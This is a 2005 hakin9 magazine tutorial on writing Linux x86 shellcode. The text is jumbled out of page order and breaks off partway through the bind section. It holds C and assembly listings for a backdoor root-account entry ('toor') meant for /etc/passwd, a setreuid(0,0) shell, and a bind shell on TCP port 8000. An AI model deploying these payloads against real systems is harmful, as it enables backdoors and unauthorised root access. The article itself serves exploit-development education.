
Linux shellcode optimisation

Michał Piotrowski

A shellcode is an essential part of any exploit. During an attack, it is injected into the target application and performs the desired actions within it. However, the basic rules for building shellcodes are not widely known, even though they don't require advanced skills.

A shellcode (sometimes also called a bytecode) is a sequence of commands in machine code, constituting a vital element of all buffer overflow exploits. During an attack, the exploit injects its shellcode into a running application, causing it to execute the intruder's commands within the target program. The name shellcode originates from the earliest codes of this type, whose purpose was to bring up the system shell (in UNIX-based systems, the shell is the /bin/sh program). The term currently encompasses all manner of codes, performing a huge variety of actions.

Any shellcode has to fulfill a number of requirements. The first is that it cannot contain null bytes (0x00), since these signify the end of a character string and terminate processing for many functions commonly exploited for buffer overflows – strcpy(), strcat(), sprintf(), gets() etc. A shellcode must also be autonomous and operate independently of its current address in memory, so static addressing cannot be used. Other features which can occasionally be significant are the size and ASCII character set of the shellcode.

Let's have a look at writing shellcodes in practice. We will create four programs with different functionality and then go on to modify them so as to compact and adapt them for use in actual exploits. Note that we will be looking exclusively at shellcodes, not buffer overflow attacks or writing exploits.

To create an operational shellcode, we'll need a thorough understanding of assembly language for the shellcode's target processor (see Inset Registers and instructions). We'll be working on 32-bit x86 processors running the Linux operating system with the 2.4 kernel – all examples work with the 2.6 series of the Linux kernel, too – so we have a choice of two main assembler syntax conventions: AT&T and Intel.

What you will learn...

• how to write a working shellcode,
• how to modify and compact it.

What you should know...

• you should be familiar with the Linux operating system,
• the basics of programming in C and assembler.

www.hakin9.org

hakin9 5/2005

Linux shellcodes

Registers and instructions

Registers (see Table 1) are small memory cells within the CPU, used for storing the numerical values required by the processor during program execution. In 32-bit x86 CPUs, the size of the registers is 32 bits (4 bytes). Registers can be divided according to their purpose into data registers (EAX, EBX, ECX, EDX) and address registers (ESI, EDI, ESP, EBP, EIP).

Data registers are divided up into smaller sections of 16 bits (AX, BX, CX, DX) and 8 bits (AH, AL, BH, BL, CH, CL, DH, DL). The smaller registers can be used to decrease code size and get rid of padding null bytes (see Figure 1). Most of the address registers have their own specific uses and should not be used for storing ordinary data.

Table 1. Registers in an x86 processor and their purposes

EAX, AX, AH, AL – accumulator: Arithmetical operations, I/O operations and specifying the required system call. Also holds the value returned by a system call.

EBX, BX, BH, BL – base register: Used for indirect memory addressing. Also holds the first argument of a system call.

ECX, CX, CH, CL – counter: Typically used as a loop counter. Also holds the second argument of a system call.

EDX, DX, DH, DL – data register: Used to store variable addresses. Also holds the third argument of a system call.

ESI – source address, EDI – target address: Typically used for manipulating long data sequences, including strings and arrays.

ESP – stack top pointer: Holds the address of the top of the stack.

EBP – base pointer, frame pointer: Holds the address of the base of the current stack frame. Used to refer to local variables stored in the current stack frame.

EIP – instruction pointer: Holds the address of the next instruction to be executed.

Although AT&T syntax is used by the majority of compilers and debuggers (including gcc and gdb), we will use Intel syntax for its greater clarity. All examples will be compiled using the Netwide Assembler (nasm) version 0.98.35, available in most popular Linux distributions. We will also use the ndisasm and hexdump utilities.

Assembly language instructions are basically symbolic processor commands. There are quite a few of them, and the most important ones can be divided into:

• move instructions (mov, push, pop),
• arithmetical instructions (add, sub, inc, neg, mul, div),
• logical instructions (and, or, xor, not),
• control flow instructions (jmp, call, int, ret),

Table 2. Summary of the most useful assembler instructions

Instruction: Description

mov – move: Copies the contents of the source operand into the target operand: mov <target>, <source>.

push – put value on the stack: Copies the contents of the source operand onto the stack: push <source>.

pop – get value from the stack: Moves a value from the stack into the specified target operand: pop <target>.

add – arithmetic addition: Adds the contents of the source operand to the target operand: add <target>, <source>.

sub – arithmetic subtraction: Subtracts the contents of the source operand from the target operand: sub <target>, <source>.

xor – exclusive OR: Calculates the symmetric difference (bitwise exclusive OR) of the two specified operands: xor <target>, <source>.

jmp – jump: Writes the specified address to the EIP register: jmp <address>.

call – call: Works like jmp, but before writing to the EIP register it puts the address of the next instruction on the stack: call <address>.

lea – load address: Writes the address of the <source> operand to the <target> operand: lea <target>, <source>.

int – interrupt: Sends the specified signal to the system kernel, calling the interrupt with the specified number: int <value>.

Figure 1. Structure of the EAX


Listing 1. The write.c file

#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    char *line = "hello, world!\n";

    write(1, line, strlen(line));
    exit(0);
}

Our final and most advanced program is called bind (see Listing 4). When executed, the program listens on TCP port 8000 and, upon receiving an incoming connection, transfers communication to a running shell. This imitates the mode of operation of typical exploits used against network servers.

Figure 2 illustrates the compilation process and the effect of running the programs.

Listing 4. The bind.c file

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main()
{
    char *name[2];
    int fd1, fd2;
    struct sockaddr_in serv;

    name[0] = "/bin/sh";
    name[1] = NULL;
    serv.sin_addr.s_addr = 0;
    serv.sin_port = htons(8000);
    serv.sin_family = AF_INET;
    fd1 = socket(AF_INET, SOCK_STREAM, 0);
    bind(fd1, (struct sockaddr *)&serv, 16);
    listen(fd1, 1);
    fd2 = accept(fd1, 0, 0);
    dup2(fd2, 0);
    dup2(fd2, 1);
    dup2(fd2, 2);
    execve(name[0], name, NULL);
}

Listing 2. The add.c file

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    char *name = "/file";
    char *line = "toor:x:0:0::/:/bin/bash\n";
    int fd;

    fd = open(name, O_WRONLY | O_APPEND);
    write(fd, line, strlen(line));
    close(fd);
    exit(0);
}

On to assembler

Now that we know our applications are working as they should, we can go on to rewriting them in assembler. Our general aim is to execute the same system functions as in the C programs, but to do this we need to know the system call numbers assigned to the functions. This information can be obtained from the /usr/include/asm/unistd.h file – the write() function is number 4, exit() is 1, open() is 5, close() is 6, setreuid() is 70, execve() is 11 and dup2() is 63. Socket manipulation functions are a slightly different story – socket(), bind(), listen() and accept() are all served by the same system call, socketcall (number 102).

We also need to provide the functions with the necessary arguments. The first program only uses write() and exit(), so the matter is simple. The write() function takes three arguments: the target file descriptor, a pointer to the source data buffer and the number of characters to be written. The exit() function only takes one argument – the exit status.

• instructions for manipulating bits, bytes and character strings (shl, shr, rol, ror),
• input/output instructions (in, out),
• flag control instructions.

We won't go into all the available instructions, but rather we'll concentrate on just the ones we need. Table 2 presents a brief summary of the required instructions.

Building the shellcode

Our aim is to write four shellcodes, performing four different operations: writing a string to the standard output, appending data to a file, starting the system shell and binding the shell to a TCP port. We will start writing the programs in C, as it's much easier to translate a ready program into assembler than to write it in assembler from scratch.

The first program is simply called write – Listing 1 presents its source code. Its sole purpose is to write the message stored in the line variable to the standard output.

Listing 2 shows another program, this time called add. Its purpose is to open a file called /file in writeable mode (the file may be empty, but it has to exist) and append to it the line toor:x:0:0::/:/bin/bash. In reality we should be appending this entry to the /etc/passwd file, but for the time being it will be safer to refrain from modifying the password file.

The third program, called shell, is a classic shellcode. Its task is to run /bin/sh after executing the setreuid(0, 0) function to restore system privileges to the running process (this is necessary when attacking a suid program that has dropped its system privileges for security reasons). Listing 3 shows the source of the shell program.

Listing 3. The shell.c file

#include <stdio.h>
#include <unistd.h>

int main()
{
    char *name[2];

    name[0] = "/bin/sh";
    name[1] = NULL;
    setreuid(0, 0);
    execve(name[0], name, NULL);
}

Write

Listing 5 presents the source code of the assembler equivalent of the write program. Lines 1 and 4 contain declarations for the data section (.data) and code section (.text). Line 6 marks the default ELF linker entry point, which has to be a global symbol due to the use of the ld linker (line 5). Line 2 defines the msg variable – a string of byte-size characters (the db parameter), terminated


Listing 5. The write1.asm file

 1: section .data
 2: msg db 'hello, world!', 0x0a
 3:
 4: section .text
 5:     global _start
 6: _start:
 7:
 8:     ; write(1, msg, 14)
 9:     mov eax, 4
10:     mov ebx, 1
11:     mov ecx, msg
12:     mov edx, 14
13:     int 0x80
14:
15:     ; exit(0)
16:     mov eax, 1
17:     mov ebx, 0
18:     int 0x80

specify the function's two parameters:

• the address of the name variable, stored in the EBX register;
• the value 1025 (the numeric representation of the combined O_WRONLY and O_APPEND flags), stored in the ECX register.

Figure 2. Compilation and execution of the write, add, shell and bind programs

After it is executed, the open() function returns its result (the descriptor number for the opened file) in the EAX register. We'll need the descriptor value to execute the write() and close() functions, so in line 15 we move it into the EBX register. Thus, the next function to be called (i.e. write()) has its first argument (the descriptor number) in the right place (the EBX register). Now we put 4 in the EAX register, the address of the line variable in the ECX register and 24 (the length of the appended line) in the EDX register, and transfer execution to the system kernel (line 21).

We then need to close /file by calling close() (the EAX register should contain 6, while EBX still holds the descriptor number for the opened file) and we can end the program by calling exit() (with 1 in EAX and 0 in EBX). Figure 4 presents the compilation and execution of the program.

with a line feed character (0x0a). Lines 8 and 15 are comments and are ignored by the assembler. Lines 9–13 and 16–18 contain instructions preparing and executing the write() and exit() functions. Let's take a closer look at them.

To start with, we write the number of the system call to be executed into the EAX register (write is number 4) and put the function arguments into the appropriate registers: EBX should contain the standard output descriptor (number 1), ECX is filled with the starting address of the string to be written (stored in the msg variable), and EDX holds the string length (14 characters including the line feed). We then execute the instruction int 0x80, which takes execution into kernel mode and executes the relevant system function. The same mechanism applies to the exit() function – we put its number (1) in the EAX register, write 0 to EBX and enter kernel mode once again.

Figure 3 presents the compilation and execution of our first program rewritten in assembler.

Add

Listing 6 shows the code of the assembler rewrite of our second program, add. As you can see, it is slightly more complicated than the previous example.

We start by declaring two character variables in the data section – name and line. They contain respectively the name of the file to be modified and the line we want to append. Opening the file /file requires us to put the value for the open() function (5) in the EAX register and

Shell

The shell program needs to be rewritten in a similar way – Listing 7 shows


Figure 3. Effect of executing the write1 program

Figure 4. Effect of executing the add1 program

called (1 for socket(), 2 for bind(), 4 for listen() and 5 for accept()) and the address of the memory segment containing arguments for the subroutine. Let's have a closer look at how the socket() (lines 9–16) and bind() (lines 21–35) functions are called.

As you can see in Listing 4, socket() takes three arguments:

• protocol family (AF_INET – Internet protocols),
• protocol type (SOCK_STREAM – connection-oriented protocol),
• the protocol itself (0 – TCP).

We need to store the arguments somewhere in memory – the best place will be the stack (lines 9–11), but we'll need to push values onto the stack in reverse order, since a stack is a LIFO list, so values are retrieved from last to first. Starting with line 9, we push the third argument onto the stack (0), then the second (1 – SOCK_STREAM) and finally the first (2 – AF_INET). Once that's done, we can specify arguments for the call to socketcall():

the resulting source code. We won't go into detail over it, but rather we'll take a closer look at the seemingly complex execve() function call (lines 15–21).

The first argument of the execve() function is the character string (line 16) specifying the path to the executed program (/bin/sh). The second argument is an array containing at least two elements: the path string and a NULL value. To prepare this array, we must resort to using the stack, first putting the second array element on the stack (NULL – line 17) and then the first element (the address of the name string – line 18). Then we set the second function argument (line 19) using the ESP register, which holds the address of the top of the stack and therefore the starting address of our array. The third and final argument is handled simply by loading 0 into the EDX register (as shown in line 20). The complete program is compiled and run just like our other programs.

Listing 6. The add1.asm file

 1: section .data
 2: name db '/file', 0
 3: line db 'toor:x:0:0::/:/bin/bash', 0x0a
 4:
 5: section .text
 6:     global _start
 7: _start:
 8:
 9:     ; open(name, O_WRONLY|O_APPEND)
10:     mov eax, 5
11:     mov ebx, name
12:     mov ecx, 1025
13:     int 0x80
14:
15:     mov ebx, eax
16:
17:     ; write(fd, line, 24)
18:     mov eax, 4
19:     mov ecx, line
20:     mov edx, 24
21:     int 0x80
22:
23:     ; close(fd)
24:     mov eax, 6
25:     int 0x80
26:
27:     ; exit(0)
28:     mov eax, 1
29:     mov ebx, 0
30:     int 0x80

• load 102 into EAX (line 13),
• load EBX with the socket() subroutine number (line 14),
• load ECX with the address of socket() subroutine arguments

Listing 7. The shell1.asm file

 1: section .data
 2: name db '/bin/sh', 0
 3:
 4: section .text
 5:     global _start
 6: _start:
 7:
 8:     ; setreuid(0, 0)
 9:     mov eax, 70
10:     mov ebx, 0
11:     mov ecx, 0
12:     int 0x80
13:
14:     ; execve("/bin/sh", ["/bin/sh", NULL], NULL)
15:     mov eax, 11
16:     mov ebx, name
17:     push 0
18:     push name
19:     mov ecx, esp
20:     mov edx, 0
21:     int 0x80

Bind

The last of our shellcodes is the most complicated and requires a more detailed explanation due to the specific way of calling socket functions. Listing 8 presents the assembler version of the bind program.

The socket(), bind(), listen() and accept() functions are served by the same system call (socketcall), which takes two arguments: the number of the subroutine to be
